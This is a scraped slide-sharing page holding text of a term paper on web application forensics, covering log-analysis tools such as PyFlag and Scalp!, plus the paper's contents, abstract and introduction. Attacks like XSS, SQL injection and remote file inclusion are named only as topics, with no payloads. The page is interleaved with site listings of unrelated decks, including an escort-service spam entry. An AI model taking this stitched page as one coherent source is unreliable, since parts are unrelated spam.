obtained collection could be also reduced via white-listing, as TRR 7. Moreover, after data is
collected, the examiner can apply index searching via natural language like queries, comparatively
to Splunk. These features explain the efficient searching by the PyFlag. Another interesting aspect
of the tool is the implementation of GeoIP36( Apache). It can be either obtained from the Debian
repository, which presents a smaller GeoIP collection, or downloaded from the GeoIP website as a
complete collection. GeoIP allows to parse the IPs and Timestamps and correlate them to the origin
location of the GET/POST requests in the log file. This respects TRR 3. The tool can also store the
collected evidence payload in output formats like .cvs, which explains its utilization as a Front-end
to other tools applied to the investigation. An illustration of the PyFlag Web-GUI is given at
Appendix B, Figure 23. To conclude the tool's description, we should mention once more time the
open question of possible compromising of the Web-GUI as explained at the Splunk representation.
A well known attack concerning HTTP Pollution on ModSecurity37 is presented by Luca Carettoni38
in 2009, where the IDS is exploited by an XSS instead of utilizing an image upload to the system.
As mentioned above this advocates the fact that, the tool should be revised for such kind of exploits
and especially rechecked for possible DOM based XSS exploits, concerning its own source.


Apache-scalp or Scalp!


This tool should be considered as explicitly WAFO investigation tool. Scalp! is developed by
Romain Gaucher and the project is hosted on code.google.com. Its current version is 0.4 rev. 28,
2008. The tool is the only one of the described above, which definitely deploys RegExes. It
represents a python script, which can be run in the python console on the common OSes and makes
it OS independent. The tool is published under the Apache License 2.0 and is specified for parsing
especially Apache log files, which denotes its usability only on the class of these log files and does
not respect TRR 1 and 2. It is tested only on a couple of MiB log files, which disrespects further

36 http://www.maxmind.com/app/mod_geoip
37 http://www.modsecurity.org/
38 http://www.linkedin.com/in/lucacarettoni

                                                   36
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends
Web Application Forensics: Taxonomy and Trends

Más contenido relacionado

La actualidad más candente

Computer forensic
Computer forensicComputer forensic
Computer forensic
bhavithd
 

La actualidad más candente (20)

Registry Forensics
Registry ForensicsRegistry Forensics
Registry Forensics
 
Intro to cyber forensics
Intro to cyber forensicsIntro to cyber forensics
Intro to cyber forensics
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
 
Registry forensics
Registry forensicsRegistry forensics
Registry forensics
 
Digital Forensic
Digital ForensicDigital Forensic
Digital Forensic
 
Network forensics and investigating logs
Network forensics and investigating logsNetwork forensics and investigating logs
Network forensics and investigating logs
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
CompTIA PenTest+: Everything you need to know about the exam
CompTIA PenTest+: Everything you need to know about the examCompTIA PenTest+: Everything you need to know about the exam
CompTIA PenTest+: Everything you need to know about the exam
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat Sheet
 
Social Media Forensics for Investigators
Social Media Forensics for InvestigatorsSocial Media Forensics for Investigators
Social Media Forensics for Investigators
 
Cyber forensics question bank
Cyber forensics   question bankCyber forensics   question bank
Cyber forensics question bank
 
INCIDENT RESPONSE CONCEPTS
INCIDENT RESPONSE CONCEPTSINCIDENT RESPONSE CONCEPTS
INCIDENT RESPONSE CONCEPTS
 
Cloud-forensics
Cloud-forensicsCloud-forensics
Cloud-forensics
 
Windows registry forensics
Windows registry forensicsWindows registry forensics
Windows registry forensics
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Digital forensics
Digital forensics Digital forensics
Digital forensics
 
Windows Forensic 101
Windows Forensic 101Windows Forensic 101
Windows Forensic 101
 
Introduction to forensic imaging
Introduction to forensic imagingIntroduction to forensic imaging
Introduction to forensic imaging
 
Computer forensic
Computer forensicComputer forensic
Computer forensic
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
 

Similar a Web Application Forensics: Taxonomy and Trends

Fackrell_S_s1400430_CT4017_Report_Group_2
Fackrell_S_s1400430_CT4017_Report_Group_2Fackrell_S_s1400430_CT4017_Report_Group_2
Fackrell_S_s1400430_CT4017_Report_Group_2
Sean Fackrell
 
It Sector Risk Assessment Report Final
It Sector Risk Assessment Report FinalIt Sector Risk Assessment Report Final
It Sector Risk Assessment Report Final
Hongyang Wang
 
Final Report
Final ReportFinal Report
Final Report
tdsrogers
 
Guardi final report
Guardi final reportGuardi final report
Guardi final report
Steph Cliche
 
Thematic_Mapping_Engine
Thematic_Mapping_EngineThematic_Mapping_Engine
Thematic_Mapping_Engine
tutorialsruby
 
Thematic_Mapping_Engine
Thematic_Mapping_EngineThematic_Mapping_Engine
Thematic_Mapping_Engine
tutorialsruby
 
Fusegrade_FinalReport
Fusegrade_FinalReportFusegrade_FinalReport
Fusegrade_FinalReport
Dylan Moore
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)
Oliver Hader
 
Luswishi Farmblock Land Cassifciation
Luswishi Farmblock Land CassifciationLuswishi Farmblock Land Cassifciation
Luswishi Farmblock Land Cassifciation
Charles Bwalya
 
Ringuette_Dissertation_20140527
Ringuette_Dissertation_20140527Ringuette_Dissertation_20140527
Ringuette_Dissertation_20140527
Rebecca Ringuette
 
Pawar-Ajinkya-MASc-MECH-December-2016
Pawar-Ajinkya-MASc-MECH-December-2016Pawar-Ajinkya-MASc-MECH-December-2016
Pawar-Ajinkya-MASc-MECH-December-2016
Ajinkya Pawar
 
Final Design Report
Final Design ReportFinal Design Report
Final Design Report
Jason Ro
 
4 g americas developing integrating high performance het-net october 2012
4 g americas  developing integrating high performance het-net october 20124 g americas  developing integrating high performance het-net october 2012
4 g americas developing integrating high performance het-net october 2012
Zoran Kehler
 
Symantec Internet Security Threat Report - 2009
Symantec Internet Security Threat Report - 2009Symantec Internet Security Threat Report - 2009
Symantec Internet Security Threat Report - 2009
guest6561cc
 
Spring Reference
Spring ReferenceSpring Reference
Spring Reference
asas
 

Similar a Web Application Forensics: Taxonomy and Trends (20)

Fackrell_S_s1400430_CT4017_Report_Group_2
Fackrell_S_s1400430_CT4017_Report_Group_2Fackrell_S_s1400430_CT4017_Report_Group_2
Fackrell_S_s1400430_CT4017_Report_Group_2
 
It Sector Risk Assessment Report Final
It Sector Risk Assessment Report FinalIt Sector Risk Assessment Report Final
It Sector Risk Assessment Report Final
 
Capturing Knowledge Of User Preferences With Recommender Systems
Capturing Knowledge Of User Preferences With Recommender SystemsCapturing Knowledge Of User Preferences With Recommender Systems
Capturing Knowledge Of User Preferences With Recommender Systems
 
Final Report
Final ReportFinal Report
Final Report
 
Energy Systems Optimization Of A Shopping Mall
Energy Systems Optimization Of A Shopping MallEnergy Systems Optimization Of A Shopping Mall
Energy Systems Optimization Of A Shopping Mall
 
Guardi final report
Guardi final reportGuardi final report
Guardi final report
 
Thematic_Mapping_Engine
Thematic_Mapping_EngineThematic_Mapping_Engine
Thematic_Mapping_Engine
 
Thematic_Mapping_Engine
Thematic_Mapping_EngineThematic_Mapping_Engine
Thematic_Mapping_Engine
 
Design Final Report
Design Final ReportDesign Final Report
Design Final Report
 
Machine Components Test.pptx
Machine Components Test.pptxMachine Components Test.pptx
Machine Components Test.pptx
 
Fusegrade_FinalReport
Fusegrade_FinalReportFusegrade_FinalReport
Fusegrade_FinalReport
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)
 
Luswishi Farmblock Land Cassifciation
Luswishi Farmblock Land CassifciationLuswishi Farmblock Land Cassifciation
Luswishi Farmblock Land Cassifciation
 
Ringuette_Dissertation_20140527
Ringuette_Dissertation_20140527Ringuette_Dissertation_20140527
Ringuette_Dissertation_20140527
 
4th GENERATION OF WIRELESS NETWORKS (LTE)
4th GENERATION OF WIRELESS NETWORKS (LTE)4th GENERATION OF WIRELESS NETWORKS (LTE)
4th GENERATION OF WIRELESS NETWORKS (LTE)
 
Pawar-Ajinkya-MASc-MECH-December-2016
Pawar-Ajinkya-MASc-MECH-December-2016Pawar-Ajinkya-MASc-MECH-December-2016
Pawar-Ajinkya-MASc-MECH-December-2016
 
Final Design Report
Final Design ReportFinal Design Report
Final Design Report
 
4 g americas developing integrating high performance het-net october 2012
4 g americas  developing integrating high performance het-net october 20124 g americas  developing integrating high performance het-net october 2012
4 g americas developing integrating high performance het-net october 2012
 
Symantec Internet Security Threat Report - 2009
Symantec Internet Security Threat Report - 2009Symantec Internet Security Threat Report - 2009
Symantec Internet Security Threat Report - 2009
 
Spring Reference
Spring ReferenceSpring Reference
Spring Reference
 

Más de Krassen Deltchev

Automated Validation of Internet Security Protocols and Applications (AVISPA)
Automated Validation of Internet Security Protocols and Applications (AVISPA) Automated Validation of Internet Security Protocols and Applications (AVISPA)
Automated Validation of Internet Security Protocols and Applications (AVISPA)
Krassen Deltchev
 
Performance of Group Key Agreement Protocols( Theory)
Performance of Group Key Agreement Protocols( Theory) Performance of Group Key Agreement Protocols( Theory)
Performance of Group Key Agreement Protocols( Theory)
Krassen Deltchev
 
XAdES Specification based on the Apache XMLSec Project
XAdES Specification based on the Apache XMLSec Project XAdES Specification based on the Apache XMLSec Project
XAdES Specification based on the Apache XMLSec Project
Krassen Deltchev
 
New Web 2.0 Attacks, B.Sc. Thesis
New Web 2.0 Attacks, B.Sc. ThesisNew Web 2.0 Attacks, B.Sc. Thesis
New Web 2.0 Attacks, B.Sc. Thesis
Krassen Deltchev
 

Más de Krassen Deltchev (8)

DOM-based XSS
DOM-based XSSDOM-based XSS
DOM-based XSS
 
Automated Validation of Internet Security Protocols and Applications (AVISPA)...
Automated Validation of Internet Security Protocols and Applications (AVISPA)...Automated Validation of Internet Security Protocols and Applications (AVISPA)...
Automated Validation of Internet Security Protocols and Applications (AVISPA)...
 
Automated Validation of Internet Security Protocols and Applications (AVISPA)
Automated Validation of Internet Security Protocols and Applications (AVISPA) Automated Validation of Internet Security Protocols and Applications (AVISPA)
Automated Validation of Internet Security Protocols and Applications (AVISPA)
 
Performance of Group Key Agreement Protocols( Theory)
Performance of Group Key Agreement Protocols( Theory) Performance of Group Key Agreement Protocols( Theory)
Performance of Group Key Agreement Protocols( Theory)
 
XAdES Specification based on the Apache XMLSec Project
XAdES Specification based on the Apache XMLSec Project XAdES Specification based on the Apache XMLSec Project
XAdES Specification based on the Apache XMLSec Project
 
Sqlia classification v1, till 2010
Sqlia classification v1, till 2010Sqlia classification v1, till 2010
Sqlia classification v1, till 2010
 
New Web 2.0 Attacks, B.Sc. Thesis
New Web 2.0 Attacks, B.Sc. ThesisNew Web 2.0 Attacks, B.Sc. Thesis
New Web 2.0 Attacks, B.Sc. Thesis
 
DOM-based XSS
DOM-based XSSDOM-based XSS
DOM-based XSS
 

Último

The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
QucHHunhnh
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
MateoGardella
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
kauryashika82
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
negromaestrong
 

Último (20)

Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 

Web Application Forensics: Taxonomy and Trends

  • 1. Web Application Forensics Taxonomy and Trends term paper Krassen Deltchev Krassen.Deltchev@rub.de 5. September 2011 Ruhr-University of Bochum Department of Electrical Engineering and Information Technology Chair of Network and Data Security Horst Görtz Institute First examiner: Prof. Jörg Schwenk Second Examiner and Supervisor: M.Sc. Dominik Birk
  • 2. Contents List of Figures .................................................................................................................................. 3 List of Tables ................................................................................................................................... 3 Abbreviations ................................................................................................................................... 4 Abstract ............................................................................................................................................ 5 1. Introduction .................................................................................................................................. 7 1.1. What is Web Application Forensics? .................................................................................... 7 1.2. Limitations of this paper ....................................................................................................... 8 1.3. Reference works ................................................................................................................... 9 2. Intruder profiles and Web Attacking Scenarios .......................................................................... 11 2.1. Intruder profiling ................................................................................................................. 12 2.2. Current Web Attacking scenarios ........................................................................................ 14 2.3. New Trends in Web Attacking deployment and preventions .............................................. 15 3. Web Application Forensics ......................................................................................................... 19 3.1. Examples of Webapp Forensics techniques ........................................................................ 23 3.2. WebMail Forensics ............................................................................................................. 25 3.3. Supportive Forensics ........................................................................................................... 27 4. Webapp Forensics tools .............................................................................................................. 29 4.1. Requirements for Webapp forensics tools .......................................................................... 29 4.2. Proprietary tools .................................................................................................................. 31 4.3. Open Source tools ............................................................................................................... 34 5. Future work ................................................................................................................................ 39 6. Conclusion .................................................................................................................................. 41 Appendixes .................................................................................................................................... 42 Appendix A .................................................................................................................................... 42 Application Flow Analysis ............................................................................................................ 42 WAFO victim environment preparedness ...................................................................................... 44 Appendix B .................................................................................................................................... 45 Proprietary WAFO tools ................................................................................................................ 45 Open Source WAFO tools ............................................................................................................. 48 Results of the tool's comparison .................................................................................................... 49 List of links .................................................................................................................................... 50 Bibliography .................................................................................................................................. 52 2
  • 3. List of Figures Figure 1: General Digital Forensics Classification, WAFO allocation ............................................. 8 Figure 2: Web attacking scenario taxonomic construction .............................................................. 15 Figure 3: Digital Forensics: General taxonomy .............................................................................. 20 Figure 4: WAFO phases, in Jess Garcia[1] ...................................................................................... 21 Figure 5: Extraneous White Space on Request Line, in [3] ............................................................ 23 Figure 6: Google Dorks example, in [3] .......................................................................................... 24 Figure 7: Malicious queries at Google search by spammers, in [3] ................................................ 24 Figure 8: faked Referrer URL by spammers, in [3] ......................................................................... 24 Figure 9: RFI, pulling c99 shell, in [3] ............................................................................................ 24 Figure 10: Simple Classic SQLIA, in [3] ........................................................................................ 25 Figure 11: NBO evidence in Webapp log, in [3] ............................................................................. 25 Figure 12: HTML representation of spam-mail( e-mail spoofing) .................................................. 26 Figure 13: e-mail header snippet of the spam-mail in Figure 12 .................................................... 26 Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 ......... 27 Figure 15: Main PyFlag data flow, as [L26] .................................................................................... 35 Figure 16: Improving the Testing process of Web Application Scanners, Rafal Los [10] .............. 43 Figure 17: Flow based Threat Analysis, Example, Rafal Los [10] .................................................. 43 Figure 18: Forensics Readiness, in Jess Garcia [13] ....................................................................... 44 Figure 19: MS LogParser general flow, as [L16] ............................................................................ 45 Figure 20: LogParser-scripting example, as [L17] .......................................................................... 45 Figure 21: Splunk licenses' features ................................................................................................ 46 Figure 22: Splunk, Windows Management Instrumentation and MSA( ISA) queries, at WWW .. 47 Figure 23: PyFlag- load preset and log file output, at WWW ......................................................... 48 Figure 24: apache-scalp or Scalp! log file output( XSS query), as [L25] ....................................... 48 List of Tables Table 1: Abbreviations ....................................................................................................................... 4 Table 2: A proposal for general taxonomic approach, considering the complete WAFO description ... 11 Table 3: Example of possible Webapp attacking scenario ............................................................... 16 Table 4: Standard vs. Intelligent Web intruder ................................................................................ 17 Table 5: Web Application Forensics Overview, in [15] ................................................................... 21 Table 6: A general Taxonomy of the Forensics evidence, in [1] ..................................................... 22 Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] ..................................... 22 Table 8: Traditional vs. Reactive forensics Approaches, in [13] ..................................................... 29 Table 9: Functional vs. Security testing, Rafal Los [10] ................................................................. 42 Table 10: Standards & Specifications of EFBs, Rafal Los [10] ...................................................... 42 Table 11: Basic EFD Concepts [10] ................................................................................................ 42 Table 12: Definition of Execution Flow Action and Action Types, Rafal Los [10] ........................ 42 Table 13: TRR completion on LogParser, Splunk, PyFlag, Scalp! ................................................. 49 Table 14: List of links ...................................................................................................................... 51 3
  • 4. Abbreviations Anti-Virus AV Application-Flow Analysis AFA Business-to-Business B2B Cloud-computing CC Cloud(-computing) Forensics CCFO Digital Forensics DFO Digital Image Forensics DIFO Execution-Flow-Based approach EFB Incident Response IR Microsoft MS Network Forensics NFO Non- persistent XSS NP-XSS NULL-Byte-Injection NBI Operating System(s) OS(es) Operating System(s) forensics OSFO Persistent( stored) XSS P-XSS Proof of Concept PoC Regular Expression RegEx Relational Database System RDBMS Remote File Inclusion RFI SQL Injection Attacks SQLIA Tool's requirements rules TRR Web Application Firewall(s) WAF(s) Web Application Forensics WAFO Web Application Scanner WAS Web Attacking Scenario(s) WASC Web Services Forensics WSFO Table 1: Abbreviations 4
  • 5. Abstract The topic, covering Web Application Forensics is challenging. There are not enough references, discussing this subject, especially in the Scientific communities. Often is the the term 'Web Application Forensics' misunderstood and mixed with IDS/ IPS defensive security approaches. Another issue is to discern the Web Application Forensics, short Webapp Forensics, from Network Forensics and Web Services Forensics, and in general to allocate it in the Digital/ Computer Forensics classification. Nowadays, Web Platforms are vastly growing, not to mention the so called Web 2.0 hype. Furthermore, Business Web Applications blast the common security knowledge and premise rapid inventory of the current security best practices and approaches. The questions, concerning the automation of the security defensive and investigation methods, are becoming undeniable important. In this paper we should try to dispute the questions, concerning taxonomic approaches regarding the Webapp Forensics; discuss trends, referenced to this topic and debate the matter of automation tools for Webapp forensics. Keywords Web Application Security, WebMail Security, Web Application Forensics, WebMail Forensics, Header Inspection, Plan Cache Inspection, Forensic Tools, Forensics Taxonomy, Forensics Trends 5
  • 6. 1.Introduction 1. Introduction In [1], Jess Garcia gives a definition of the term 'Forensics Readiness': “ Forensics Readiness is the “art” of Maximizing an Environment's Ability to collect Credible Digital Evidence”. This statement we should keep in mind in the further exposition of the paper. It points out several important aspects. Foremost, forensics rely on maximal collection of digital evidence. If the observed environment1 is not well prepared for forensic investigation, discovering the root, for the system is been attacked, could be: sophisticated, not efficient in time and even non deterministic in finding an appropriate remediation of the problem. Another essential aspect of Forensics, as Jess Garcia, is- the forensic investigation is an art. It is obvious to point out furthermore that, defining best practices, concerning the proper deployment of forensic work, is unbefitting. An intelligent intruder will always find drawbacks in such best-practice scenarios and try to exploit them as well to accomplish new attacks, complete them successfully and remain concealed. In this way of thoughts, appears the question, how can we suggest taxonomy, regarding forensic work, if we are aware a priori of the risks such recipes include? We shall propose several general intruders' strategies and profiling of the modern Web attacker in the paper, keeping in mind not to hurt the universal validity of the statements we discuss. In some cases we shall give examples and paradigms through references, though only for the matter of the good illustration of the statements in the current thesis. Let us describe more precisely the matters, concerning the Webapp Forensics in the next section. 1.1. What is Web Application Forensics? Web Application Forensics( WAFO) is a post mortem investigation of a compromised Web Application( Webapp) system. WAFO consider especially attacks on Layer 7 of the ISO/OSI model. In distinction to this, capturing and filtering of internet protocols on-the-fly is not a concern of the Webapp forensics. More precisely, such issues in general are in the focus of Network Forensics( NFO). Nevertheless, examining the log files of such automated tools( IDS/ IPS/ traffic filters/ WAF etc.) is supportive for the right deployment of the Webapp forensic investigation. As stated above, NFO examine in concrete such issues, that's why we should like to discern Webapp Forensics from it, keeping in mind the supportive function, which Network forensic tools can supply to WAFO. Consequently, we should like to specifically allocate WAFO in the Digital Forensics( DFO) structure, because some main topics in DFO are not implicitly referred to Layer 7 of the ISO/OSI Model. Such should be designated as follows: Memory Investigations, Operating Systems Forensics investigations, Secure Data Recovery on physical storage of OSes etc. Nevertheless, DFO consider investigations of image manipulations [L1], [L2], which in some cases could be also very supportive for the proper deployment of WAFO. At last, we should categorize WAFO as a sub-class of Cloud Forensics( CCFO) [2]. Cloud 1 we assume that, the reader understands the abstraction of the Webapp as a WAFO environment 7
  • 7. 1.Introduction Forensics is a relatively new term in the Security communities. Historically, the existence of Web Applications lead in phase to the Cloud-Computing( CC). Concerning the complexity of the Web applications, platforms and services presented by the CC, CCFO cover larger investigation areas than the WAFO. As an example, WAFO is not explicitly observing fraud on Web Services. Web Services are covered by the Web Services Forensics( WSFO), another sub-class of CCFO, and should be categorical discerned from WAFO, please read further. Let us illustrate the DFO taxonomic structure in the next Figure: Figure 1: General Digital Forensics Classification, WAFO allocation On behalf of this short introduction of the different Computer Forensics categories, let's designate explicitly the limitations of the paper. This concerns the better understanding of the paper's exposition and explain the absence of examples, covering different exotic attacking scenarios. 1.2. Limitations of this paper This term paper discusses Web Application Forensics, which excludes topics as on-the-fly packet capturing, packet inspection of sensitive data over ( security) internet protocols. Once again to mention, it does not cover attacks, or attacking scenarios on lower layer than Layer 7 ISO/ OSI Model. For the interested reader, a very good correlation of the Layer 7 Attacks and below, concerning Web Application Security and Forensics can be found at [3]. In distinction to Web Services Forensics [5] and CCFO [2], the presented paper covers only a small topic, concerning the varieties of fraud Web Applications: • RIA( AJAX, RoR2, Flash, Silverlight et al.) , 2 RoR- Ruby on Rails, http://rubyonrails.org/ 8
  • 8. 1.Introduction • static Web Applications, • dynamic Web Applications and Web Content( .asp(x), .php, .do etc. ), • other Web Implementations( like different CMSes), excluding research on fraud, concerning Web Services Security, or CC Implementations, but explicitly Web Applications. Due to the marginal limitations of the term paper, the reader shall find a couple of illustrating examples, which do not pretend to cover the variety of illustrative scenarios of Web Attacking Techniques and Web Application Forensics approaches. For the reader concerned, attacks on Layer 7 are introduced and some of them discussed in detail at [4]. Furthermore, we should denote a clarification, regarding the references in this paper, considering their proper uniformity, as follows. General knowledge should be referenced by footnotes at the appropriate position. The scientifically approved works are indexed at the end of the paper in the Bibliography, as ordinary. Non scientifically approved works, also video-tutorials, live video snapshots of conferences, blogs etc. are indexed by the List of links after the Appendix of this paper. We should imply this strict references' sources division, with respect to the Security Scientific Communities. In addition to this, let us introduce some of the interesting related works dedicated on the topic of WAFO. 1.3. Reference works An extensive approach, covering the different aspects of Web Application Forensics, is given in the book “Detecting Malice” [3], by Robert Hansen3. The interested reader can find much more than just WAFO discussions in this book, but in addition to these also examples of attacks on lower level than Layer 7, correlated to the WAFO investigations and many paradigms, derived from real-life WAFO investigations. The unprepared reader should notice that, the topics in the book, discussing WAFO tools, are limited. The author of the book points out the sentence, that every WAFO investigation should be considered as unique, especially in its tactical accomplishment, therefore favoring of top automated tools, should be assumed as inappropriate, please read further. Another interesting approach is given by SANS Institute as Practical Assignment, covering three notable topics: penetration testing of a compromised Linux System, a post mortem WAFO on the observed environment and discussions on the legal aspects of the Forensics investigation [6]. Despite the fact that, this tutorial in its Version 1.4 is no more relying on an up-to-date example, it illustrates very important basics, concerning WAFO and can be used still as a fundamental reading for further research on the WAFO topic. BSI4, Germany, describes in the Section, Forensic Toolkits, at “Leitfaden “IT-Forensik” [7], Version 1.0, September 2010, different Forensic tools for automated analysis, many of them concerning implicitly WAFO. The toolkits are compared by the following aspects: • analyzing of log-data, 3 http://www.sectheory.com/bio.htm 4 https://www.bsi.bund.de/EN/Home/home_node.html 9
  • 9. 1.Introduction • tests, concerning time consistency, • tests, concerning syntax consistency, • tests, concerning semantic consistency, • log-data reduction, • log-data correlation, concerning integration and combining of different log-data sources in a consistent timeline, integration/ combining of events to super-events, • detection of timing correlations( MAC timings) between events. The given approaches can be related to WAFO log file analysis, which designates them as reasonable supportive WAFO investigation methods. Another tutorial, giving basic overview, which should be also considered as fundamental regarding WAFO research, is: “Web Application Forensics: The Uncharted Territory”, presented at [8]. Although, the paper is published in 2002, it should not be categorized it in a speedy manner as obsolete. Other papers, articles and presentation papers, concerning specific WAFO aspects, complete the group of the related references, concerning the Web Application Forensics research in this term paper. These should be referenced at the appropriate paragraphs in the paper's exposition and not be discussed individually in this section, furthermore. Let's describe the structure of the term paper. Chapter 2 should give a taxonomic illustration on the topics, designating intruders' profiling and modern Web Attacking Scenarios. Chapter 3 deliberates WAFO investigation methods and techniques more detailed and concerns further discussion on the matter of signification of a possible WAFO taxonomy. In Chapter 4 are illustrated the WAFO investigation supportive tools. An important section outlines the questions, concerning the requirements of WAFO toolkits, which points out the reasonable aspects for determining the tools either as relevant, or inappropriate for adequate WAFO investigations. Two major group of favorite tools should be designated: Proprietary Toolkits and Open Source solutions. Chapter 5 represents the final discussion on the paper's thesis and suggestions for future work on behalf of the discussed topics in the former chapters. In Chapter 6 is deliberated the Conclusion on the proposed thesis. The Appendix demonstrates an additional information( tables, diagrams, screenshots and code snippets) on specific topics, discussed in the exposition part of the paper. Let us proceed with the description of the Web Attacking Scenarios and ( Web) Intruder profiles. 10
